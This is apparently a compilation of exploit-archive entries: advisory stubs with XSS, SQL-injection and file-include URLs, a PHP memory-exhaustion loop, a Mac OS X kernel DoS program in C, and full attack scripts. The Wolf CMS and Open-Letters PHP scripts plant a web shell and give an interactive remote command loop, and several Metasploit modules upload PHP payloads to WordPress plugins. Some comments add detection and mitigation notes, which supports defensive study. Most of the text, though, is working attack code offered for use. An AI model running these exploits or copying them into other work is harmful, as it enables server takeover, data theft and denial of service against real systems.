or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
source: https://www.securityfocus.com/bid/52059/info
ButorWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ButorWiki 3.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
source: https://www.securityfocus.com/bid/52058/info
Pandora FMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Pandora FMS 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!]
source: https://www.securityfocus.com/bid/52053/info
CMS Faethon is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Faethon 1.3.4 is vulnerable; other versions may also be affected.
http://www.example.com/articles.php?by_author=[SQL]
http://www.example.com/article.php?id=[SQL]
source: https://www.securityfocus.com/bid/52043/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.
PHP versions prior to 5.3.9 are vulnerable.
<?php
// PoC for the advisory above: on PHP releases before 5.3.9 each strtotime() call
// with this timezone-qualified string leaks memory, and the unbounded loop keeps
// calling it until the process has exhausted the memory available to it.
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>
source: https://www.securityfocus.com/bid/52046/info
Tube Ace is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=
#####################################################################################
Title: Oracle Outside-In DOCX File Parsing Memory Corruption
Platforms: Windows
CVE:
Secunia:
{PRL}: 2015-04
Author: Francis Provencher (Protek Research Lab’s)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-02-17: Francis Provencher from Protek Research Lab’s found the issue;
2015-02-18: Oracle Security Alerts confirmed the issue;
2015-04-15: Oracle released a patch for this issue.
#####################################################################################
============================
3) Technical details
============================
The vulnerability is caused by a certain value in a document and can be exploited to corrupt memory via a specially crafted document.
Successful exploitation may allow execution of arbitrary code.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-04.docx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36788.docx
source: https://www.securityfocus.com/bid/52026/info
LEPTON is prone to multiple input-validation vulnerabilities, including:
1. A cross-site scripting vulnerability
2. An SQL-injection vulnerability
3. A local file-include vulnerability
4. Multiple HTML-injection vulnerabilities
Exploiting these issues could allow an attacker to execute arbitrary script and PHP code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LEPTON 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/admins/login/forgot/index.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Wolf CMS Arbitrary File Upload Exploit
Date : 22 April 2015
Exploit Author : CWH Underground
Discovered By : ZeQ3uL
Site : www.2600.in.th
Vendor Homepage : https://www.wolfcms.org/
Software Link : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
Version : 0.8.2
####################
SOFTWARE DESCRIPTION
####################
Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3.
Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.
#######################################
VULNERABILITY: Arbitrary File Upload
#######################################
This exploits a file upload vulnerability found in Wolf CMS 0.8.2, and possibly earlier versions. Attackers can abuse the
upload feature, as an authenticated user, to upload a malicious PHP file into the application, which results in arbitrary remote code execution.
The vulnerability was found on File Manager Function (Enabled by default), which provides interfaces to manage files from the administration.
In this simple example, there are no restrictions made regarding the type of files allowed for uploading.
Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of a victim server.
Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the Internet.
/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
-----------------------------------------------------------------------------
// Clean filenames
$filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
$filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);
if (isset($_FILES)) {
$file = $this->_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite);
if ($file === false)
Flash::set('error', __('File has not been uploaded!'));
}
-----------------------------------------------------------------------------
#####################
Disclosure Timeline
#####################
[04/04/2015] - Issue reported to Developer Team
[08/04/2015] - Discussed for fixing the issue
[16/04/2015] - Issue reported to http://seclists.org/oss-sec/2015/q2/210
[22/04/2015] - Public disclosure
#####################################################
EXPLOIT
#####################################################
*/
// Silence PHP diagnostics, lift the script execution time limit and cap socket
// waits at 50 seconds so a silent target does not hang the script forever.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
/**
 * Send one raw HTTP request over a fresh TCP connection to port 80 and
 * return everything the server writes back until it closes the socket.
 *
 * @param string $host   target host name or address
 * @param string $packet complete request, headers and body included
 * @return string|false  raw response as returned by stream_get_contents()
 */
function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    if (!$sock) {
        die("\n[-] No response from {$host}:80\n");
    }
    fwrite($sock, $packet);
    $response = stream_get_contents($sock);
    return $response;
}
// Banner.
print "\n+---------------------------------------+";
print "\n| WolfCMS Arbitrary File Upload Exploit |";
print "\n+---------------------------------------+\n";
// Needs the host, the application path and the credentials of an existing
// account: the file-manager upload endpoint is only reached after logging in.
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <path> <user> <pass>\n";
print "\nExample....: php $argv[0] localhost /wolfcms test password\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
// Step 1: authenticate through the admin login form. The PHPSESSID=cwh cookie
// and the hard-coded login[redirect] value are fixed strings, which together
// with the custom header used further down make this script easy to match in
// web-server logs.
$login = "login[username]={$user}&login[password]={$pass}&login[redirect]=/wolfcms/?/admin/";
$packet = "POST {$path}/?/admin/login/login HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=cwh\r\n";
$packet .= "Content-Length: ".strlen($login)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$login}";
$response = http_send($host, $packet);
// Collect every Set-Cookie header. $sid[1][2] below is the third cookie the
// server returned, so the script silently depends on the server's header order.
if (!preg_match_all("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
// Step 2: fetch the file-manager page and scrape its csrf_token hidden fields.
// $token[1][4] takes the fifth match — another positional assumption. A login
// failure is only detected indirectly, by the token not being present.
$packet = "GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1][2]}\r\n";
$packet .= "Connection: close\r\n\r\n";
$response=http_send($host, $packet);
if (!preg_match_all("/csrf_token\" type=\"hidden\" value=\"(.*?)\" \/>/i", $response, $token)) die("\n[-] The username/password is incorrect!\n");
print "\n[+] Login Successfully !!\n";
sleep(2);
print "\n[+] Retrieving The Upload token !!\n";
print "[+] The token is: {$token[1][4]}\n";
// Step 3: multipart upload of a file named shell.php. The name keeps its .php
// extension because the server-side filter quoted in the header comment only
// strips characters outside [a-z0-9_-.] and never checks the extension; an
// extension allow-list, or storing uploads outside the web root, closes this.
// The "___" marker lets the client locate command output later.
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"csrf_token\"\r\n\r\n";
$payload .= "{$token[1][4]}\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"upload_file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}/?/admin/plugin/file_manager/upload HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1][2]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
// Fire-and-forget: the upload response is never inspected.
http_send($host, $packet);
// Step 4: the uploaded file is requested from /public/. Each command travels
// base64-encoded in a custom "Cmd" request header — a distinctive signature for
// log review — and the output after the "___" marker is printed. "exit" stops.
$packet = "GET {$path}/public/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nWolf-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version: 7.1.1.17759
Fixed version: 7.1.1.18527
Reported by: Mike Westmacott
Details:
The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.
Exploit:
In order to retrieve a file from a vulnerable server use the following URL in a web browser and intercept the response from the server:
http://TARGETHOST/cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\TARGETFILE
The browser will display a broken image, however the HTTP response will contain the file’s contents.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5370/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
/*
* 2015, Maxime Villard, CVE-2015-1100
* Local DoS caused by a missing limit check in the fat loader of the Mac OS X
* Kernel.
*
* $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
* $ ./Mac-OS-X_Fat-DoS BINARY-NAME
*
* Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
* Analysis: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <spawn.h>
#include <unistd.h>
#include <err.h>
#include <mach-o/fat.h>
#include <sys/stat.h>
/* Claimed architecture count and its byte-swapped form. Fat headers are
 * big-endian on disk, so when the host-order value MAXNUM is written into
 * the header the kernel decodes it as MAXNUM0 (identical to MAXNUM on a
 * big-endian host, the byte-swapped value on a little-endian one). */
#define MAXNUM (4096)
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))
/*
 * Create a fat (universal) binary at `name` whose header advertises an
 * oversized architecture count — the value the advisory says the kernel's
 * fat loader fails to bound. Every failure is fatal via err(3).
 *
 * nfat_arch is written as 4096 (MAXNUM) in host order; because the on-disk
 * format is big-endian, the count the kernel decodes equals MAXNUM0, which is
 * also the number of fat_arch entries appended, so the file is self-consistent.
 */
void CraftBinary(char *name)
{
struct fat_header fat_header;
struct fat_arch *arches;
size_t i;
int fd;
memset(&fat_header, 0, sizeof(fat_header));
fat_header.magic = FAT_MAGIC;
fat_header.nfat_arch = 4096;
/* Zero-filled table: only cputype is set, every other field stays 0. */
if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
err(-1, "calloc");
for (i = 0; i < MAXNUM0; i++)
arches[i].cputype = CPU_TYPE_I386;
/* NOTE(review): O_CREAT without a mode argument leaves the new file's
 * permission bits unspecified until the fchmod() below; there is no O_TRUNC,
 * so an existing larger file keeps its trailing bytes. */
if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
err(-1, "open");
/* Only a -1 return is treated as failure; short writes are not detected. */
if (write(fd, &fat_header, sizeof(fat_header)) == -1)
err(-1, "write");
if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
err(-1, "write");
/* Owner-execute only, so the file can be handed to posix_spawn(). */
if (fchmod(fd, S_IXUSR) == -1)
err(-1, "fchmod");
close(fd);
free(arches);
}
/*
 * Ask the kernel to execute the crafted file through posix_spawn() with a
 * binary-preference list of { CPU_TYPE_HPPA, 0 }. Presumably no slice matches
 * that type, so the loader walks the whole oversized arch table — confirm
 * against the analysis linked in the header. The advisory describes a local
 * DoS, so the "Goodbye!" line is printed before the call; if the machine
 * survives, the posix_spawn() return code is reported instead.
 */
void SpawnBinary(char *name)
{
cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
char *argv[] = { "Crazy Horse", NULL };
char *envp[] = { NULL };
posix_spawnattr_t attr;
size_t set = 0;
int ret;
/* NOTE(review): the posix_spawnattr_* functions return an errno value (0 on
 * success), not -1, so these two checks never trigger on failure. */
if (posix_spawnattr_init(&attr) == -1)
err(-1, "posix_spawnattr_init");
if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
err(-1, "posix_spawnattr_setbinpref_np");
fprintf(stderr, "----------- Goodbye! -----------\n");
ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
}
/*
 * Entry point: expects exactly one argument, the path of the file to create
 * and then spawn. Falling off the end of main() yields 0 under C99; the usage
 * branch therefore also exits with 0.
 */
int main(int argc, char *argv[])
{
if (argc != 2) {
printf("Usage: %s BINARY-NAME\n", argv[0]);
} else {
CraftBinary(argv[1]);
SpawnBinary(argv[1]);
}
}
<?php
/*
OutPut:
#[+] Author: TUNISIAN CYBER
#[+] Script coded BY: Egidio Romano aka EgiX
#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability
#[+] Date: 19-04-2015
#[+] Vendor: http://www.open-letters.de/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] CVE:
#[+] Twitter: @TCYB3R
#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com
#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png
OL-shell>
*/
// Silence PHP diagnostics, lift the script execution time limit and cap socket
// waits at 5 seconds (shorter than the sibling script above, which uses 50).
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
/**
 * Send one raw HTTP request over a fresh TCP connection to port 80 and
 * return everything the server writes back until it closes the socket.
 *
 * @param string $host   target host name or address
 * @param string $packet complete request, headers and body included
 * @return string|false  raw response as returned by stream_get_contents()
 */
function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    if (!$sock) {
        die( "\n[-] No response from {$host}:80\n");
    }
    fwrite($sock, $packet);
    $response = stream_get_contents($sock);
    return $response;
}
// Banner (mirrors the header comment).
print "#[+] Author: TUNISIAN CYBER\n";
print "#[+] Script coded BY: Egidio Romano aka EgiX\n";
print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";
print "#[+] Date: 19-04-2015\n";
print "#[+] Vendor: http://www.open-letters.de/\n";
print "#[+] Type: WebAPP\n";
print "#[+] Tested on: KaliLinux (Debian)\n";
print "#[+] CVE:\n";
print "#[+] Twitter: @TCYB3R\n";
print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n";
print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png";
// Only host and path are needed; the script performs no login step, so the
// endpoint below appears to be reachable without authentication.
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /zenphoto/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
// The "foo" form field carries PHP source. Per the title this is a code
// injection: the target writes the parameter into a PHP file (inc/data.php is
// fetched next) instead of treating it as data; the "_code_" marker lets the
// client find command output in the response. Mitigation: never write request
// parameters into executable files, and validate folder names strictly.
$exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
// $path is concatenated directly, so it must end with '/' (see the usage examples).
$packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($exploit)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$exploit}";
// Fire-and-forget: the injection response is never inspected.
http_send($host, $packet);
// Interactive loop: each command is base64-encoded into a custom "Cmd" request
// header — a distinctive string for log review — and the output after the
// "_code_" marker is printed. "exit" stops; any non-matching response aborts.
$packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nOL-shell> ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
ADB backup archive path traversal file overwrite
------------------------------------------------
Using adb one can create a backup of his/her Android device and store it
on the PC. The backup archive is based on the tar file format.
By modifying tar headers to contain ../../ like patterns it is possible
to overwrite files owned by the system user on writeable partitions.
An example pathname in the tar header:
apps/com.android.settings/sp/../../../../data/system/evil.txt
Tar header checksum must be corrected of course.
When restoring the modified archive the BackupManagerService overwrites
the resolved file name, since file name is not sanitized.
Bugfix in the version control:
https://android.googlesource.com/platform/frameworks/base/+/7bc601d%5E!/#F0
Android 5 (Lollipop) and newer versions are not affected (due to the
official bugfix linked above).
Additional conditions for exploiting on pre-Lollipop systems:
- The partition of the destination file must be mounted writeable (e.g.
/system won't work, but /data does)
- It is not possible to overwrite files owned by root, since the process
doing the restore runs as the same user as the package itself, and
Android packages cannot run as root.
- It is not possible to overwrite files owned by system user since AOSP
4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
was introduced "... ignoring non-agent system package ".
(If the operating system is custom and there is a system package
available with a full backup agent specified explicitly, then that
custom Android 4.3 and 4.4 might be affected too.)
Pre 4.3 AOSP systems are affected without further conditions: it is
possible to overwrite files owned by the system user or any other
packages installed on the system.
Tested on: Android 4.0.4:
Reported on: 2014-07-14
Assigned CVE: CVE-2014-7951
Android bug id: 16298491
Discovered by: Imre Rad / Search-Lab Ltd.
http://www.search-lab.hu
http://www.securecodingacademy.com/
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit exploit for the WordPress "Work The Flow" plugin 2.5.2. Per the
# description, the bundled jQuery-File-Upload server script accepts a PHP file
# and stores it under a web-reachable path, so the upload is executed by simply
# requesting it afterwards. Server-side mitigation: an extension allow-list on
# the upload handler (or removing the demo handler) and upgrading to the
# version the check below treats as fixed. Detection: a POST to
# .../jQuery-File-Upload-9.5.0/server/php/index.php followed by a GET of a new
# .php name under .../server/php/files/.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Work The Flow Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,
version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Claudio Viviani', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7883'],
['EDB', '36640'],
['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Work The Flow 2.5.2', {}]],
'DisclosureDate' => 'Mar 14 2015',
'DefaultTarget' => 0)
)
end
# Version check against the plugin readme; 2.5.4 is passed as the fixed version.
def check
check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.4')
end
# Upload the PHP payload under a random name, then request it to trigger execution.
def exploit
# Random 8-15 letter name with a .php extension.
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="action"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
# NOTE(review): success is judged on the status code alone; the sibling
# modules on this page also match the body, which avoids mistaking a 200
# error page for a deployed payload.
if res.code == 200
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
# FileDropper removes the uploaded file once a session is established.
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
# NOTE(review): 'ERROR' tells the operator nothing; "no response from server" would.
fail_with(Failure::Unknown, 'ERROR')
end
print_status("#{peer} - Calling payload...")
# Fetching the stored file is what runs the payload.
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit exploit for the WordPress "Creative Contact Form" plugin 0.9.7
# (plugin slug sexy-contact-form). Per the description, its includes/fileupload
# handler accepts a PHP file and stores it under a web-reachable path, so the
# upload is executed by requesting it afterwards. Server-side mitigation: an
# extension allow-list on the upload handler and upgrading to the version the
# check below treats as fixed. Detection: a POST to
# .../sexy-contact-form/includes/fileupload/index.php followed by a GET of a
# new .php name under .../fileupload/files/.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Creative Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Gianni Angelozzi', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '35057'],
['OSVDB', '113669'],
['WPVDB', '7652']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Creative Contact Form 0.9.7', {}]],
'DisclosureDate' => 'Oct 22 2014',
'DefaultTarget' => 0)
)
end
# Version check against the plugin readme; 1.0.0 is passed as the fixed version.
def check
check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
end
# Upload the PHP payload under a random name, then request it to trigger execution.
def exploit
# Random 8-15 letter name with a .php extension.
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
post_data = data.to_s
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
# Success requires a 200 whose body mentions either "files" or the chosen
# name; the alternation means "files" alone is enough to pass.
if res.code == 200 && res.body =~ /files|#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
# FileDropper removes the uploaded file once a session is established.
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
# NOTE(review): 'ERROR' tells the operator nothing; "no response from server" would.
fail_with(Failure::Unknown, 'ERROR')
end
print_status("#{peer} - Calling payload...")
# Fetching the stored file is what runs the payload.
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit exploit for the WordPress "N-Media Website Contact Form" plugin
# 1.3.4. Unlike the other modules on this page the upload goes through
# admin-ajax.php, and the server chooses the stored name, which is read back
# from the JSON reply and then requested under wp-content/uploads/contact_files/.
# Server-side mitigation: an extension allow-list on the AJAX upload action and
# upgrading to the version the check below treats as fixed. Detection: an
# admin-ajax POST carrying action=nm_webcontact_upload_file with a .php
# filename, followed by a GET under wp-content/uploads/contact_files/.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Claudio Viviani', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
['WPVDB', '7896']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]],
'DisclosureDate' => 'Apr 12 2015',
'DefaultTarget' => 0)
)
end
